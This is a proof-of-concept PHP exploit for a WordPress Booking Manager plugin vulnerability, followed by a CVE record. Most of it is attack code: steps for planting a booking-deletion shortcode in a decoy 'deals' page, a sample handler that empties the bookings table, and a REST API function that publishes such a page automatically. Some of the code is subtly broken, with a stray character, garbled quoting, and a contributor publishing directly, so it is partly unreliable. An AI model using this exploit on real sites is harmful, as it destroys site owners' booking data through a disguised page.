CVE-2025-10124

<?php /** * CVE-2025-10124 PoC - Booking Manager WordPress Plugin Shortcode Abuse * This PoC demonstrates how a contributor-level user can create a page * that deletes all bookings when visited by any user. * * The vulnerability exists in Booking Manager plugin versions before 2.1.15 * where the booking deletion shortcode is accessible to contributor+ users. */ // Step 1: Register as a contributor on the target WordPress site // (assuming user registration is enabled) // Step 2: Login and create a new page with the following content: // The malicious shortcode embedded in page content: $malicious_page_content = '"' . '[booking_manager_delete]' . '"' . '"' . ' Check out our latest deals! ' . '"'; // Step 3: Submit the page for review (contributor-level action) // WordPress will render this shortcode when any visitor views the page // Step 4: When an admin/editor visits the page, the shortcode executes // and triggers the booking deletion function without proper permission checks // Demonstration of the vulnerable code pattern in the plugin: function vulnerable_shortcode_handler($atts) { // VULNERABILITY: Only checks if user is logged in, not if user is admin if (is_user_logged_in()) { // Directly executes the deletion without capability check global $wpdb; $wpdb->query("DELETE FROM {$wpdb->prefix}booking_manager_bookings"); return "Bookings deleted successfully"; } return "Please login to continue"; } // The fix should include proper capability check: function fixed_shortcode_handler($atts) { // FIXED: Check for administrator capability before deletion if (!current_user_can('manage_options')) { return "You do not have permission to perform this action"; } global $wpdb; $wpdb->query("DELETE FROM {$wpdb->prefix}booking_manager_bookings"); return "Bookings deleted successfully"; } // Register the shortcode (vulnerable version) add_shortcode('booking_manager_delete', 'vulnerable_shortcode_handler'); // Automated exploitation via WordPress REST API (if applicable): function exploit_via_rest_api($site_url, $username, $password, $auth_cookie) { $endpoint = $site_url . '/wp-json/wp/v2/pages'; $page_data = array( 'title' => 'Important Announcement', 'content' => '[booking_manager_delete] Welcome to our site!', 'status' => 'publish' ); $args = array( 'method' => 'POST', 'headers' => array( 'Content-Type' => 'application/json', 'Cookie' => $auth_cookie ),n 'body' => json_encode($page_data) ); // Send the request to create the malicious page $response = wp_remote_post($endpoint, $args); return $response; } ?>

{"cve": {"id": "CVE-2025-10124", "sourceIdentifier": "[email protected]", "published": "2025-10-10T06:15:32.217", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Manager WordPress plugin before 2.1.15 registers a shortcode that deletes bookings and makes that shortcode available to anyone with contributor and above privileges. When a page containing the shortcode is visited, the bookings are deleted."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/9bb0589f-34bb-40e1-b7f0-ee883b7b896c/", "source": "[email protected]"}]}}